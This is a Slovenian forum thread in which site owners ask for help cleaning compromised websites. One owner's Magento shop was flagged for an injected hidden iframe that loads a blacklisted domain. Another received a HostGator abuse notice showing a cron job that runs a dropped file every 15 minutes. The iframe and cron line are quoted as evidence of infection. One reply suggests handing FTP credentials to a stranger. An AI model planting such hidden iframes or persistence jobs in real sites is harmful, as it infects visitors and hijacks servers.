I: pomoč (magento) Malware
8 naročnikov
8 naročnikov
Fizična oseba
Pozdravljeni!
Iščem pomoč oziroma dobro dušo, ki se spozna na magento oziroma odstranjevanje "virusa", google mi je včeraj blokiral spletno trgovino zaradi Malwara
Suspected injected code Instances
<iframe style="visibility: hidden; display: none; display: n
one;" src="http://gaoanalitics.info/?id={145D07A7-CA91-44A0-
9BFF-1EAAF26E2C35}">
Je pa bila fora, da sem dal pred 2 dnevoma indijcu, da mi nekaj porihta, vendar do sedaj še na strani ni delal nič.
Imate kakšen predlog? Stran je blokirana z strani googla in antivirusnih programov.
Hvala za pomoč in odgovore
12 odgovorov
Poišči v datotekah spletne trgovine kje je vstavljen ta iframe in ga odstrani. Če ti ne bo šlo mi lahko pošlješ FTP podatke in ti jaz najdem kje se nahaja ta koda...
Zamenjaj FTP geslo in počisti iframe iz kode.
Proble je bil, ker si najbrž dal temu indijcu FTP podatke, ta ti jih je pa namerno ali nenamerno zlorabil.
Torej, če se odstrani iframe bi moralo bit ok? Ali so mogoče okužene vse datoteke? Kako je sploh možno, da se je zgodilo kaj takšnega? (če izključimo možnost da je indijec to sam naredil)?
najbolš da narediš search skozi vse datoteke, da najdeš vse okužene..
Lahko je bila izkoriščena kakšna ranljivost v Magentu ali pa v kakšnem naloženem modulu.. Ko počistiš naredi še update na najnovejšo verzijo
na koncu html kode je:
<iframe style="visibility: hidden; display: none; display: none;" src="http://gaoanalitics.info/?id={145D07A7-CA91-44A0-9BFF-1EAAF26E2C35}"></iframe>
Ali obstaja možnost, da ko sem odprl svojo stran stran, da sem dobil virus še na svoj računalnik?
V bistvu tukaj ne gre za nek "virus", problem je le, ker je ta stran gaoanalitics . info na "črni listi" tebi je pa nekdo v kodo vrinil skrit "okvir", ki vsebuje to stran... Google pa najde to tudi če je očem običajnega obiskovalca skrito. Raje ne omogočaj neznancem dostopa do datotek, če ti je dodal samo tole je še OK, lahko ti je vrinil še kakšno kodo s katero bo kasneje lahko brez problema izkoriščal, da bo dobil dostop do spletne strani - med vsemi datotekami težko, da boš našel dodatne vrinjene kode, najbolje bi bilo da bi pogledal loge na strežniku kaj je sploh počel...
Vsem se zahvaljujem za pomoč in odgovore, zadevo mi je BREZPLAČNO rešil Domen oziroma žabci, kjer tudi gostujem)
Pozdravljeni
Prosila bi za pomoč. Že pred časom sem dobila obvestilo od hostgatorja, pa sem hotela vse skupi pustit pri miru, ampak sem se odločila da je škoda 6 letnega truda pa denarja vreči v koš.
poslali so mi tole:
Hello,
Our Abuse department has received a report regarding malware being hosted on an account under your control. We have disabled site access for your account to prevent further complaints, and have provided a list of the reported content.
In order to remove the restrictions weve placed, you must resolve the security issue and remove what malicious content was listed. Please note that repeated reports of malicious content on your account within 60 days of an initial notice will lead to further action being taken, including permanent suspension after failing to professionally clean the account.
Once you have taken steps to secure your account of the reported content, please reply back to this ticket to request review.
[root@gator3297 ~]# crontab -u kura -l
*/15 * * * * /var/tmp/hPWaeOfG >/dev/null 2>&1
[root@gator3297 ~]# stat /var/spool/cron/kura
File: `/var/spool/cron/kura'
Size: 47 Blocks: 8 IO Block: 4096 regular file
Device: 97bh/2427d Inode: 525247 Links: 1
Access: (0600/-rw-------) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2015-09-16 19:01:02.057168631 -0500
Modify: 2015-09-16 19:01:02.057168631 -0500
Change: 2015-09-16 19:01:02.057168631 -0500
Je mogoče kje kdo, ki bi mi znal pomagat? Bila bi zelo hvaležna.
Kakšen dostop imaš do strežnika?
Poglej kaj imaš v datoteki /var/tmp/hPWaeOfG .
- septembra je nekdo dodal opravilo, ki vsakih 15 minut izvaja zgornjo datoteko.